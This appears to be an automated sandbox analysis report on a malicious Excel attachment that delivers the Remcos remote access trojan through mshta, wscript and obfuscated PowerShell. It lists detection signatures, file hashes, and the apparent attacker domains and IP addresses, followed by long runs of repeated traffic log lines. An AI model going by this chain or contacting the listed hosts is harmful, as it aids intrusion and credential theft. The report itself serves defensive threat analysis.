Windows Analysis Report
A & C Metrology OC 545714677889Materiale.xls

Overview

General Information

Sample name:	A & C Metrology OC 545714677889Materiale.xls
Analysis ID:	1545826
MD5:	3d240803d6a9ad22dcc9d51d15c89279
SHA1:	5f93ce2e9216c89d155ec35b60dc2aae2f618bbd
SHA256:	d4d28af1f5d5e72ff66ae165e2d232764bc88f7dfdd380cce3b5c7a593fd9e40
Infos:

Detection

Remcos, HTMLPhisher

Score:	100
Range:	0 - 100
Whitelisted:	false
Confidence:	100%

Signatures

Detected Remcos RAT

Malicious sample detected (through community Yara rule)

Multi AV Scanner detection for submitted file

Sigma detected: Remcos

Suricata IDS alerts for network traffic

Yara detected HtmlPhish44

Yara detected Powershell download and execute

Bypasses PowerShell execution policy

Document exploit detected (process start blacklist hit)

Excel sheet contains many unusual embedded objects

Injects a PE file into a foreign processes

Installs new ROOT certificates

Maps a DLL or memory area into another process

Microsoft Office drops suspicious files

Obfuscated command line found

PowerShell case anomaly found

Searches for Windows Mail specific files

Sigma detected: Base64 Encoded PowerShell Command Detected

Sigma detected: Dot net compiler compiles file from suspicious location

Sigma detected: File With Uncommon Extension Created By An Office Application

Sigma detected: HackTool - CrackMapExec PowerShell Obfuscation

Sigma detected: Potential PowerShell Command Line Obfuscation

Sigma detected: Potential PowerShell Obfuscation Via Reversed Commands

Sigma detected: Potentially Suspicious PowerShell Child Processes

Sigma detected: PowerShell Base64 Encoded FromBase64String Cmdlet

Sigma detected: Suspicious MSHTA Child Process

Sigma detected: Suspicious Microsoft Office Child Process

Sigma detected: Suspicious PowerShell Parameter Substring

Sigma detected: WScript or CScript Dropper

Suspicious execution chain found

Suspicious powershell command line found

Tries to harvest and steal browser information (history, passwords, etc)

Tries to steal Instant Messenger accounts or passwords

Tries to steal Mail credentials (via file / registry access)

Tries to steal Mail credentials (via file registry)

Uses dynamic DNS services

Windows Scripting host queries suspicious COM object (likely to drop second stage)

Writes to foreign memory regions

Wscript starts Powershell (via cmd or directly)

Yara detected WebBrowserPassView password recovery tool

Allocates memory within range which is reserved for system DLLs (kernel32.dll, advapi32.dll, etc)

Compiles C# or VB.Net code

Contains functionality for read data from the clipboard

Contains functionality to call native functions

Contains functionality to check the parent process ID (often done to detect debuggers and analysis systems)

Contains functionality to dynamically determine API calls

Contains functionality to modify clipboard data

Contains long sleeps (>= 3 min)

Creates a process in suspended mode (likely to inject code)

Creates a window with clipboard capturing capabilities

Detected TCP or UDP traffic on non-standard ports

Detected potential crypto function

Document embeds suspicious OLE2 link

Document misses a certain OLE stream usually present in this Microsoft Office document type

Drops PE files

Enables debug privileges

Extensive use of GetProcAddress (often used to hide API calls)

Found WSH timer for Javascript or VBS script (likely evasive script)

Found a high number of Window / User specific system calls (may be a loop to detect user behavior)

Found dropped PE file which has not been started or loaded

Found potential string decryption / allocating functions

HTTP GET or POST without a user agent

IP address seen in connection with other malware

Internet Provider seen in connection with other malware

JA3 SSL client fingerprint seen in connection with other malware

May sleep (evasive loops) to hinder dynamic analysis

Potential document exploit detected (performs DNS queries)

Potential document exploit detected (performs HTTP gets)

Potential document exploit detected (unknown TCP traffic)

Queries the volume information (name, serial number etc) of a device

Searches for the Microsoft Outlook file path

Sigma detected: Change PowerShell Policies to an Insecure Level

Sigma detected: Dynamic .NET Compilation Via Csc.EXE

Sigma detected: Excel Network Connections

Sigma detected: Potential Binary Or Script Dropper Via PowerShell

Sigma detected: Suspicious Office Outbound Connections

Sigma detected: Usage Of Web Request Commands And Cmdlets

Sigma detected: WSF/JSE/JS/VBA/VBE File Execution Via Cscript/Wscript

Suricata IDS alerts with low severity for network traffic

Too many similar processes found

Uses Microsoft's Enhanced Cryptographic Provider

Uses a known web browser user agent for HTTP communication

Uses code obfuscation techniques (call, push, ret)

Uses insecure TLS / SSL version for HTTPS connection

Very long cmdline option found, this is very uncommon (may be encrypted or packed)

Very long command line found

Yara signature match

Classification

Malware Threat Intel
Provided by

Name	Description	Attribution	Blogpost URLs	Link
Remcos, RemcosRAT	Remcos (acronym of Remote Control & Surveillance Software) is a commercial Remote Access Tool to remotely control computers.Remcos is advertised as legitimate software which can be used for surveillance and penetration testing purposes, but has been used in numerous hacking campaigns.Remcos, once installed, opens a backdoor on the computer, granting full access to the remote user.Remcos is developed by the cybersecurity company BreakingSecurity.	APT33 The Gorgon Group UAC-0050	http://malware-traffic-analysis.net/2017/12/22/index.html https://0xmrmagnezi.github.io/malware%20analysis/RemcosRAT/ https://asec.ahnlab.com/en/32376/ https://asec.ahnlab.com/ko/25837/ https://asec.ahnlab.com/ko/32101/	https://malpedia.caad.fkie.fraunhofer.de/details/win.remcos

Signatures

AV Detection

Multi AV Scanner detection for submitted file

Source: A & C Metrology OC 545714677889Materiale.xls

ReversingLabs: Detection: 21%

Uses Microsoft's Enhanced Cryptographic Provider

Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe

Code function: 31_2_00404423 GetProcAddress,FreeLibrary,CryptUnprotectData,

31_2_00404423

Phishing

Yara detected HtmlPhish44

Source: Yara match

File source: C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\T4O403JZ\ernashgetmebackwithgoodnewswhichgrreatthings[1].hta, type: DROPPED

Uses insecure TLS / SSL version for HTTPS connection

Source: unknown	HTTPS traffic detected: 142.250.184.206:443 -> 192.168.2.22:49166 version: TLS 1.0
Source: unknown	HTTPS traffic detected: 142.250.185.65:443 -> 192.168.2.22:49167 version: TLS 1.0
Source: unknown	HTTPS traffic detected: 142.250.184.206:443 -> 192.168.2.22:49173 version: TLS 1.0
Source: unknown	HTTPS traffic detected: 172.217.16.193:443 -> 192.168.2.22:49175 version: TLS 1.0

Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE

File opened: C:\Windows\WinSxS\amd64_microsoft.vc90.crt_1fc8b3b9a1e18e3b_9.0.30729.4940_none_08e4299fa83d7e3c\MSVCR90.dll

Jump to behavior

Source: unknown	HTTPS traffic detected: 172.67.162.95:443 -> 192.168.2.22:49161 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 104.21.74.191:443 -> 192.168.2.22:49163 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 104.21.74.191:443 -> 192.168.2.22:49171 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 104.21.74.191:443 -> 192.168.2.22:49170 version: TLS 1.2

Source:	Binary string: 7C:\Users\user\AppData\Local\Temp\xcygtrxb\xcygtrxb.pdbhP source: powershell.exe, 00000005.00000002.426757676.00000000023EA000.00000004.00000800.00020000.00000000.sdmp
Source:	Binary string: 7C:\Users\user\AppData\Local\Temp\revod450\revod450.pdb source: powershell.exe, 00000012.00000002.477548914.000000000266C000.00000004.00000800.00020000.00000000.sdmp
Source:	Binary string: 7C:\Users\user\AppData\Local\Temp\xcygtrxb\xcygtrxb.pdb source: powershell.exe, 00000005.00000002.426757676.00000000023EA000.00000004.00000800.00020000.00000000.sdmp
Source:	Binary string: 7C:\Users\user\AppData\Local\Temp\revod450\revod450.pdbhP source: powershell.exe, 00000012.00000002.477548914.000000000266C000.00000004.00000800.00020000.00000000.sdmp

Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe	Code function: 31_2_0040AE51 FindFirstFileW,FindNextFileW,	31_2_0040AE51
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe	Code function: 41_2_00407EF8 FindFirstFileA,FindNextFileA,strlen,strlen,	41_2_00407EF8
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe	Code function: 42_2_00407898 FindFirstFileA,FindNextFileA,strlen,strlen,	42_2_00407898

Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe	File opened: C:\Users\user\AppData\Local\Temp\bthgghdjthgdlvyictcnxlwgz
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe	File opened: C:\Users\user\AppData\Local\Temp\qqcnootpfzoqahkwlihmmg
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe	File opened: C:\Users\user\AppData\Local\Temp\owwdnwiorrwlyboscy
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe	File opened: C:\Users\user\AppData\
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe	File opened: C:\Users\user\AppData\Local\
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe	File opened: C:\Users\user\

Software Vulnerabilities

Document exploit detected (process start blacklist hit)

Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE

Process created: C:\Windows\System32\mshta.exe

Suspicious execution chain found

Source: C:\Windows\System32\wscript.exe

Child: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

Potential document exploit detected (performs DNS queries)

Source: global traffic	DNS query: name: acesso.run
Source: global traffic	DNS query: name: acesso.run
Source: global traffic	DNS query: name: drive.google.com
Source: global traffic	DNS query: name: drive.usercontent.google.com
Source: global traffic	DNS query: name: acesso.run
Source: global traffic	DNS query: name: drive.google.com
Source: global traffic	DNS query: name: drive.usercontent.google.com
Source: global traffic	DNS query: name: seemebest2024rmc.duckdns.org
Source: global traffic	DNS query: name: seemebest2024rmc.duckdns.org
Source: global traffic	DNS query: name: geoplugin.net

Potential document exploit detected (performs HTTP gets)

Source: global traffic	TCP traffic: 192.168.2.22:49161 -> 172.67.162.95:443
Source: global traffic	TCP traffic: 192.168.2.22:49163 -> 104.21.74.191:443
Source: global traffic	TCP traffic: 192.168.2.22:49166 -> 142.250.184.206:443
Source: global traffic	TCP traffic: 192.168.2.22:49167 -> 142.250.185.65:443
Source: global traffic	TCP traffic: 192.168.2.22:49168 -> 172.67.162.95:443
Source: global traffic	TCP traffic: 192.168.2.22:49171 -> 104.21.74.191:443
Source: global traffic	TCP traffic: 192.168.2.22:49173 -> 142.250.184.206:443
Source: global traffic	TCP traffic: 192.168.2.22:49175 -> 172.217.16.193:443
Source: global traffic	TCP traffic: 192.168.2.22:49162 -> 107.174.146.46:80
Source: global traffic	TCP traffic: 192.168.2.22:49164 -> 107.174.146.46:80
Source: global traffic	TCP traffic: 192.168.2.22:49165 -> 107.174.146.46:80
Source: global traffic	TCP traffic: 192.168.2.22:49172 -> 107.174.146.46:80
Source: global traffic	TCP traffic: 192.168.2.22:49174 -> 107.174.146.46:80
Source: global traffic	TCP traffic: 192.168.2.22:49177 -> 178.237.33.50:80
Source: global traffic	TCP traffic: 192.168.2.22:49161 -> 172.67.162.95:443
Source: global traffic	TCP traffic: 192.168.2.22:49161 -> 172.67.162.95:443
Source: global traffic	TCP traffic: 192.168.2.22:49161 -> 172.67.162.95:443
Source: global traffic	TCP traffic: 192.168.2.22:49161 -> 172.67.162.95:443
Source: global traffic	TCP traffic: 192.168.2.22:49161 -> 172.67.162.95:443
Source: global traffic	TCP traffic: 192.168.2.22:49161 -> 172.67.162.95:443
Source: global traffic	TCP traffic: 192.168.2.22:49161 -> 172.67.162.95:443
Source: global traffic	TCP traffic: 192.168.2.22:49161 -> 172.67.162.95:443
Source: global traffic	TCP traffic: 192.168.2.22:49161 -> 172.67.162.95:443
Source: global traffic	TCP traffic: 192.168.2.22:49161 -> 172.67.162.95:443
Source: global traffic	TCP traffic: 192.168.2.22:49163 -> 104.21.74.191:443
Source: global traffic	TCP traffic: 192.168.2.22:49163 -> 104.21.74.191:443
Source: global traffic	TCP traffic: 192.168.2.22:49163 -> 104.21.74.191:443
Source: global traffic	TCP traffic: 192.168.2.22:49163 -> 104.21.74.191:443
Source: global traffic	TCP traffic: 192.168.2.22:49163 -> 104.21.74.191:443
Source: global traffic	TCP traffic: 192.168.2.22:49163 -> 104.21.74.191:443
Source: global traffic	TCP traffic: 192.168.2.22:49163 -> 104.21.74.191:443
Source: global traffic	TCP traffic: 192.168.2.22:49163 -> 104.21.74.191:443
Source: global traffic	TCP traffic: 192.168.2.22:49163 -> 104.21.74.191:443
Source: global traffic	TCP traffic: 192.168.2.22:49163 -> 104.21.74.191:443
Source: global traffic	TCP traffic: 192.168.2.22:49166 -> 142.250.184.206:443
Source: global traffic	TCP traffic: 192.168.2.22:49166 -> 142.250.184.206:443
Source: global traffic	TCP traffic: 192.168.2.22:49166 -> 142.250.184.206:443
Source: global traffic	TCP traffic: 192.168.2.22:49166 -> 142.250.184.206:443
Source: global traffic	TCP traffic: 192.168.2.22:49166 -> 142.250.184.206:443
Source: global traffic	TCP traffic: 192.168.2.22:49166 -> 142.250.184.206:443
Source: global traffic	TCP traffic: 192.168.2.22:49166 -> 142.250.184.206:443
Source: global traffic	TCP traffic: 192.168.2.22:49166 -> 142.250.184.206:443
Source: global traffic	TCP traffic: 192.168.2.22:49166 -> 142.250.184.206:443
Source: global traffic	TCP traffic: 192.168.2.22:49167 -> 142.250.185.65:443
Source: global traffic	TCP traffic: 192.168.2.22:49167 -> 142.250.185.65:443
Source: global traffic	TCP traffic: 192.168.2.22:49167 -> 142.250.185.65:443
Source: global traffic	TCP traffic: 192.168.2.22:49167 -> 142.250.185.65:443
Source: global traffic	TCP traffic: 192.168.2.22:49167 -> 142.250.185.65:443
Source: global traffic	TCP traffic: 192.168.2.22:49167 -> 142.250.185.65:443
Source: global traffic	TCP traffic: 192.168.2.22:49168 -> 172.67.162.95:443
Source: global traffic	TCP traffic: 192.168.2.22:49168 -> 172.67.162.95:443
Source: global traffic	TCP traffic: 192.168.2.22:49168 -> 172.67.162.95:443
Source: global traffic	TCP traffic: 192.168.2.22:49168 -> 172.67.162.95:443
Source: global traffic	TCP traffic: 192.168.2.22:49168 -> 172.67.162.95:443
Source: global traffic	TCP traffic: 192.168.2.22:49168 -> 172.67.162.95:443
Source: global traffic	TCP traffic: 192.168.2.22:49167 -> 142.250.185.65:443
Source: global traffic	TCP traffic: 192.168.2.22:49167 -> 142.250.185.65:443
Source: global traffic	TCP traffic: 192.168.2.22:49167 -> 142.250.185.65:443
Source: global traffic	TCP traffic: 192.168.2.22:49167 -> 142.250.185.65:443
Source: global traffic	TCP traffic: 192.168.2.22:49167 -> 142.250.185.65:443
Source: global traffic	TCP traffic: 192.168.2.22:49167 -> 142.250.185.65:443
Source: global traffic	TCP traffic: 192.168.2.22:49167 -> 142.250.185.65:443
Source: global traffic	TCP traffic: 192.168.2.22:49167 -> 142.250.185.65:443
Source: global traffic	TCP traffic: 192.168.2.22:49167 -> 142.250.185.65:443
Source: global traffic	TCP traffic: 192.168.2.22:49167 -> 142.250.185.65:443
Source: global traffic	TCP traffic: 192.168.2.22:49167 -> 142.250.185.65:443
Source: global traffic	TCP traffic: 192.168.2.22:49167 -> 142.250.185.65:443
Source: global traffic	TCP traffic: 192.168.2.22:49167 -> 142.250.185.65:443
Source: global traffic	TCP traffic: 192.168.2.22:49167 -> 142.250.185.65:443
Source: global traffic	TCP traffic: 192.168.2.22:49167 -> 142.250.185.65:443
Source: global traffic	TCP traffic: 192.168.2.22:49167 -> 142.250.185.65:443
Source: global traffic	TCP traffic: 192.168.2.22:49167 -> 142.250.185.65:443
Source: global traffic	TCP traffic: 192.168.2.22:49167 -> 142.250.185.65:443
Source: global traffic	TCP traffic: 192.168.2.22:49167 -> 142.250.185.65:443
Source: global traffic	TCP traffic: 192.168.2.22:49167 -> 142.250.185.65:443
Source: global traffic	TCP traffic: 192.168.2.22:49167 -> 142.250.185.65:443
Source: global traffic	TCP traffic: 192.168.2.22:49167 -> 142.250.185.65:443
Source: global traffic	TCP traffic: 192.168.2.22:49167 -> 142.250.185.65:443
Source: global traffic	TCP traffic: 192.168.2.22:49167 -> 142.250.185.65:443
Source: global traffic	TCP traffic: 192.168.2.22:49167 -> 142.250.185.65:443
Source: global traffic	TCP traffic: 192.168.2.22:49167 -> 142.250.185.65:443
Source: global traffic	TCP traffic: 192.168.2.22:49167 -> 142.250.185.65:443
Source: global traffic	TCP traffic: 192.168.2.22:49167 -> 142.250.185.65:443
Source: global traffic	TCP traffic: 192.168.2.22:49167 -> 142.250.185.65:443
Source: global traffic	TCP traffic: 192.168.2.22:49167 -> 142.250.185.65:443
Source: global traffic	TCP traffic: 192.168.2.22:49167 -> 142.250.185.65:443
Source: global traffic	TCP traffic: 192.168.2.22:49167 -> 142.250.185.65:443
Source: global traffic	TCP traffic: 192.168.2.22:49167 -> 142.250.185.65:443
Source: global traffic	TCP traffic: 192.168.2.22:49167 -> 142.250.185.65:443
Source: global traffic	TCP traffic: 192.168.2.22:49167 -> 142.250.185.65:443
Source: global traffic	TCP traffic: 192.168.2.22:49167 -> 142.250.185.65:443
Source: global traffic	TCP traffic: 192.168.2.22:49167 -> 142.250.185.65:443
Source: global traffic	TCP traffic: 192.168.2.22:49167 -> 142.250.185.65:443
Source: global traffic	TCP traffic: 192.168.2.22:49167 -> 142.250.185.65:443
Source: global traffic	TCP traffic: 192.168.2.22:49167 -> 142.250.185.65:443
Source: global traffic	TCP traffic: 192.168.2.22:49167 -> 142.250.185.65:443
Source: global traffic	TCP traffic: 192.168.2.22:49167 -> 142.250.185.65:443
Source: global traffic	TCP traffic: 192.168.2.22:49167 -> 142.250.185.65:443
Source: global traffic	TCP traffic: 192.168.2.22:49168 -> 172.67.162.95:443
Source: global traffic	TCP traffic: 192.168.2.22:49168 -> 172.67.162.95:443
Source: global traffic	TCP traffic: 192.168.2.22:49168 -> 172.67.162.95:443
Source: global traffic	TCP traffic: 192.168.2.22:49167 -> 142.250.185.65:443
Source: global traffic	TCP traffic: 192.168.2.22:49167 -> 142.250.185.65:443
Source: global traffic	TCP traffic: 192.168.2.22:49167 -> 142.250.185.65:443
Source: global traffic	TCP traffic: 192.168.2.22:49167 -> 142.250.185.65:443
Source: global traffic	TCP traffic: 192.168.2.22:49167 -> 142.250.185.65:443
Source: global traffic	TCP traffic: 192.168.2.22:49167 -> 142.250.185.65:443
Source: global traffic	TCP traffic: 192.168.2.22:49167 -> 142.250.185.65:443
Source: global traffic	TCP traffic: 192.168.2.22:49167 -> 142.250.185.65:443
Source: global traffic	TCP traffic: 192.168.2.22:49167 -> 142.250.185.65:443
Source: global traffic	TCP traffic: 192.168.2.22:49167 -> 142.250.185.65:443
Source: global traffic	TCP traffic: 192.168.2.22:49167 -> 142.250.185.65:443
Source: global traffic	TCP traffic: 192.168.2.22:49167 -> 142.250.185.65:443
Source: global traffic	TCP traffic: 192.168.2.22:49167 -> 142.250.185.65:443
Source: global traffic	TCP traffic: 192.168.2.22:49167 -> 142.250.185.65:443
Source: global traffic	TCP traffic: 192.168.2.22:49167 -> 142.250.185.65:443
Source: global traffic	TCP traffic: 192.168.2.22:49167 -> 142.250.185.65:443
Source: global traffic	TCP traffic: 192.168.2.22:49167 -> 142.250.185.65:443
Source: global traffic	TCP traffic: 192.168.2.22:49167 -> 142.250.185.65:443
Source: global traffic	TCP traffic: 192.168.2.22:49167 -> 142.250.185.65:443
Source: global traffic	TCP traffic: 192.168.2.22:49167 -> 142.250.185.65:443
Source: global traffic	TCP traffic: 192.168.2.22:49167 -> 142.250.185.65:443
Source: global traffic	TCP traffic: 192.168.2.22:49167 -> 142.250.185.65:443
Source: global traffic	TCP traffic: 192.168.2.22:49167 -> 142.250.185.65:443
Source: global traffic	TCP traffic: 192.168.2.22:49167 -> 142.250.185.65:443
Source: global traffic	TCP traffic: 192.168.2.22:49167 -> 142.250.185.65:443
Source: global traffic	TCP traffic: 192.168.2.22:49167 -> 142.250.185.65:443
Source: global traffic	TCP traffic: 192.168.2.22:49167 -> 142.250.185.65:443
Source: global traffic	TCP traffic: 192.168.2.22:49167 -> 142.250.185.65:443
Source: global traffic	TCP traffic: 192.168.2.22:49167 -> 142.250.185.65:443
Source: global traffic	TCP traffic: 192.168.2.22:49167 -> 142.250.185.65:443
Source: global traffic	TCP traffic: 192.168.2.22:49167 -> 142.250.185.65:443
Source: global traffic	TCP traffic: 192.168.2.22:49167 -> 142.250.185.65:443
Source: global traffic	TCP traffic: 192.168.2.22:49167 -> 142.250.185.65:443
Source: global traffic	TCP traffic: 192.168.2.22:49167 -> 142.250.185.65:443
Source: global traffic	TCP traffic: 192.168.2.22:49167 -> 142.250.185.65:443
Source: global traffic	TCP traffic: 192.168.2.22:49167 -> 142.250.185.65:443
Source: global traffic	TCP traffic: 192.168.2.22:49167 -> 142.250.185.65:443
Source: global traffic	TCP traffic: 192.168.2.22:49167 -> 142.250.185.65:443
Source: global traffic	TCP traffic: 192.168.2.22:49167 -> 142.250.185.65:443
Source: global traffic	TCP traffic: 192.168.2.22:49167 -> 142.250.185.65:443
Source: global traffic	TCP traffic: 192.168.2.22:49167 -> 142.250.185.65:443
Source: global traffic	TCP traffic: 192.168.2.22:49167 -> 142.250.185.65:443
Source: global traffic	TCP traffic: 192.168.2.22:49167 -> 142.250.185.65:443
Source: global traffic	TCP traffic: 192.168.2.22:49167 -> 142.250.185.65:443
Source: global traffic	TCP traffic: 192.168.2.22:49167 -> 142.250.185.65:443
Source: global traffic	TCP traffic: 192.168.2.22:49167 -> 142.250.185.65:443
Source: global traffic	TCP traffic: 192.168.2.22:49167 -> 142.250.185.65:443
Source: global traffic	TCP traffic: 192.168.2.22:49167 -> 142.250.185.65:443
Source: global traffic	TCP traffic: 192.168.2.22:49167 -> 142.250.185.65:443
Source: global traffic	TCP traffic: 192.168.2.22:49167 -> 142.250.185.65:443
Source: global traffic	TCP traffic: 192.168.2.22:49167 -> 142.250.185.65:443
Source: global traffic	TCP traffic: 192.168.2.22:49167 -> 142.250.185.65:443
Source: global traffic	TCP traffic: 192.168.2.22:49167 -> 142.250.185.65:443
Source: global traffic	TCP traffic: 192.168.2.22:49167 -> 142.250.185.65:443
Source: global traffic	TCP traffic: 192.168.2.22:49167 -> 142.250.185.65:443
Source: global traffic	TCP traffic: 192.168.2.22:49167 -> 142.250.185.65:443
Source: global traffic	TCP traffic: 192.168.2.22:49167 -> 142.250.185.65:443
Source: global traffic	TCP traffic: 192.168.2.22:49167 -> 142.250.185.65:443
Source: global traffic	TCP traffic: 192.168.2.22:49167 -> 142.250.185.65:443
Source: global traffic	TCP traffic: 192.168.2.22:49167 -> 142.250.185.65:443
Source: global traffic	TCP traffic: 192.168.2.22:49167 -> 142.250.185.65:443
Source: global traffic	TCP traffic: 192.168.2.22:49167 -> 142.250.185.65:443
Source: global traffic	TCP traffic: 192.168.2.22:49167 -> 142.250.185.65:443
Source: global traffic	TCP traffic: 192.168.2.22:49167 -> 142.250.185.65:443
Source: global traffic	TCP traffic: 192.168.2.22:49167 -> 142.250.185.65:443
Source: global traffic	TCP traffic: 192.168.2.22:49167 -> 142.250.185.65:443
Source: global traffic	TCP traffic: 192.168.2.22:49167 -> 142.250.185.65:443
Source: global traffic	TCP traffic: 192.168.2.22:49167 -> 142.250.185.65:443
Source: global traffic	TCP traffic: 192.168.2.22:49167 -> 142.250.185.65:443
Source: global traffic	TCP traffic: 192.168.2.22:49167 -> 142.250.185.65:443
Source: global traffic	TCP traffic: 192.168.2.22:49167 -> 142.250.185.65:443
Source: global traffic	TCP traffic: 192.168.2.22:49167 -> 142.250.185.65:443
Source: global traffic	TCP traffic: 192.168.2.22:49167 -> 142.250.185.65:443
Source: global traffic	TCP traffic: 192.168.2.22:49167 -> 142.250.185.65:443
Source: global traffic	TCP traffic: 192.168.2.22:49167 -> 142.250.185.65:443
Source: global traffic	TCP traffic: 192.168.2.22:49167 -> 142.250.185.65:443
Source: global traffic	TCP traffic: 192.168.2.22:49167 -> 142.250.185.65:443
Source: global traffic	TCP traffic: 192.168.2.22:49167 -> 142.250.185.65:443
Source: global traffic	TCP traffic: 192.168.2.22:49167 -> 142.250.185.65:443
Source: global traffic	TCP traffic: 192.168.2.22:49167 -> 142.250.185.65:443
Source: global traffic	TCP traffic: 192.168.2.22:49167 -> 142.250.185.65:443
Source: global traffic	TCP traffic: 192.168.2.22:49167 -> 142.250.185.65:443
Source: global traffic	TCP traffic: 192.168.2.22:49167 -> 142.250.185.65:443
Source: global traffic	TCP traffic: 192.168.2.22:49167 -> 142.250.185.65:443
Source: global traffic	TCP traffic: 192.168.2.22:49167 -> 142.250.185.65:443
Source: global traffic	TCP traffic: 192.168.2.22:49167 -> 142.250.185.65:443
Source: global traffic	TCP traffic: 192.168.2.22:49167 -> 142.250.185.65:443
Source: global traffic	TCP traffic: 192.168.2.22:49167 -> 142.250.185.65:443
Source: global traffic	TCP traffic: 192.168.2.22:49167 -> 142.250.185.65:443
Source: global traffic	TCP traffic: 192.168.2.22:49167 -> 142.250.185.65:443
Source: global traffic	TCP traffic: 192.168.2.22:49167 -> 142.250.185.65:443
Source: global traffic	TCP traffic: 192.168.2.22:49167 -> 142.250.185.65:443
Source: global traffic	TCP traffic: 192.168.2.22:49167 -> 142.250.185.65:443
Source: global traffic	TCP traffic: 192.168.2.22:49167 -> 142.250.185.65:443
Source: global traffic	TCP traffic: 192.168.2.22:49167 -> 142.250.185.65:443
Source: global traffic	TCP traffic: 192.168.2.22:49167 -> 142.250.185.65:443
Source: global traffic	TCP traffic: 192.168.2.22:49167 -> 142.250.185.65:443
Source: global traffic	TCP traffic: 192.168.2.22:49167 -> 142.250.185.65:443
Source: global traffic	TCP traffic: 192.168.2.22:49167 -> 142.250.185.65:443
Source: global traffic	TCP traffic: 192.168.2.22:49167 -> 142.250.185.65:443
Source: global traffic	TCP traffic: 192.168.2.22:49167 -> 142.250.185.65:443
Source: global traffic	TCP traffic: 192.168.2.22:49167 -> 142.250.185.65:443
Source: global traffic	TCP traffic: 192.168.2.22:49167 -> 142.250.185.65:443
Source: global traffic	TCP traffic: 192.168.2.22:49167 -> 142.250.185.65:443
Source: global traffic	TCP traffic: 192.168.2.22:49167 -> 142.250.185.65:443
Source: global traffic	TCP traffic: 192.168.2.22:49167 -> 142.250.185.65:443
Source: global traffic	TCP traffic: 192.168.2.22:49167 -> 142.250.185.65:443
Source: global traffic	TCP traffic: 192.168.2.22:49167 -> 142.250.185.65:443
Source: global traffic	TCP traffic: 192.168.2.22:49167 -> 142.250.185.65:443
Source: global traffic	TCP traffic: 192.168.2.22:49167 -> 142.250.185.65:443
Source: global traffic	TCP traffic: 192.168.2.22:49167 -> 142.250.185.65:443
Source: global traffic	TCP traffic: 192.168.2.22:49167 -> 142.250.185.65:443
Source: global traffic	TCP traffic: 192.168.2.22:49167 -> 142.250.185.65:443
Source: global traffic	TCP traffic: 192.168.2.22:49167 -> 142.250.185.65:443
Source: global traffic	TCP traffic: 192.168.2.22:49167 -> 142.250.185.65:443
Source: global traffic	TCP traffic: 192.168.2.22:49167 -> 142.250.185.65:443
Source: global traffic	TCP traffic: 192.168.2.22:49167 -> 142.250.185.65:443
Source: global traffic	TCP traffic: 192.168.2.22:49167 -> 142.250.185.65:443
Source: global traffic	TCP traffic: 192.168.2.22:49167 -> 142.250.185.65:443
Source: global traffic	TCP traffic: 192.168.2.22:49167 -> 142.250.185.65:443
Source: global traffic	TCP traffic: 192.168.2.22:49167 -> 142.250.185.65:443
Source: global traffic	TCP traffic: 192.168.2.22:49167 -> 142.250.185.65:443
Source: global traffic	TCP traffic: 192.168.2.22:49167 -> 142.250.185.65:443
Source: global traffic	TCP traffic: 192.168.2.22:49167 -> 142.250.185.65:443
Source: global traffic	TCP traffic: 192.168.2.22:49167 -> 142.250.185.65:443
Source: global traffic	TCP traffic: 192.168.2.22:49167 -> 142.250.185.65:443
Source: global traffic	TCP traffic: 192.168.2.22:49167 -> 142.250.185.65:443
Source: global traffic	TCP traffic: 192.168.2.22:49167 -> 142.250.185.65:443
Source: global traffic	TCP traffic: 192.168.2.22:49167 -> 142.250.185.65:443
Source: global traffic	TCP traffic: 192.168.2.22:49167 -> 142.250.185.65:443
Source: global traffic	TCP traffic: 192.168.2.22:49167 -> 142.250.185.65:443
Source: global traffic	TCP traffic: 192.168.2.22:49167 -> 142.250.185.65:443
Source: global traffic	TCP traffic: 192.168.2.22:49167 -> 142.250.185.65:443
Source: global traffic	TCP traffic: 192.168.2.22:49167 -> 142.250.185.65:443
Source: global traffic	TCP traffic: 192.168.2.22:49167 -> 142.250.185.65:443
Source: global traffic	TCP traffic: 192.168.2.22:49167 -> 142.250.185.65:443
Source: global traffic	TCP traffic: 192.168.2.22:49167 -> 142.250.185.65:443
Source: global traffic	TCP traffic: 192.168.2.22:49167 -> 142.250.185.65:443
Source: global traffic	TCP traffic: 192.168.2.22:49167 -> 142.250.185.65:443
Source: global traffic	TCP traffic: 192.168.2.22:49167 -> 142.250.185.65:443
Source: global traffic	TCP traffic: 192.168.2.22:49167 -> 142.250.185.65:443
Source: global traffic	TCP traffic: 192.168.2.22:49167 -> 142.250.185.65:443
Source: global traffic	TCP traffic: 192.168.2.22:49167 -> 142.250.185.65:443
Source: global traffic	TCP traffic: 192.168.2.22:49167 -> 142.250.185.65:443
Source: global traffic	TCP traffic: 192.168.2.22:49167 -> 142.250.185.65:443
Source: global traffic	TCP traffic: 192.168.2.22:49167 -> 142.250.185.65:443
Source: global traffic	TCP traffic: 192.168.2.22:49167 -> 142.250.185.65:443
Source: global traffic	TCP traffic: 192.168.2.22:49167 -> 142.250.185.65:443
Source: global traffic	TCP traffic: 192.168.2.22:49167 -> 142.250.185.65:443
Source: global traffic	TCP traffic: 192.168.2.22:49167 -> 142.250.185.65:443
Source: global traffic	TCP traffic: 192.168.2.22:49167 -> 142.250.185.65:443
Source: global traffic	TCP traffic: 192.168.2.22:49167 -> 142.250.185.65:443
Source: global traffic	TCP traffic: 192.168.2.22:49167 -> 142.250.185.65:443
Source: global traffic	TCP traffic: 192.168.2.22:49167 -> 142.250.185.65:443
Source: global traffic	TCP traffic: 192.168.2.22:49167 -> 142.250.185.65:443
Source: global traffic	TCP traffic: 192.168.2.22:49167 -> 142.250.185.65:443
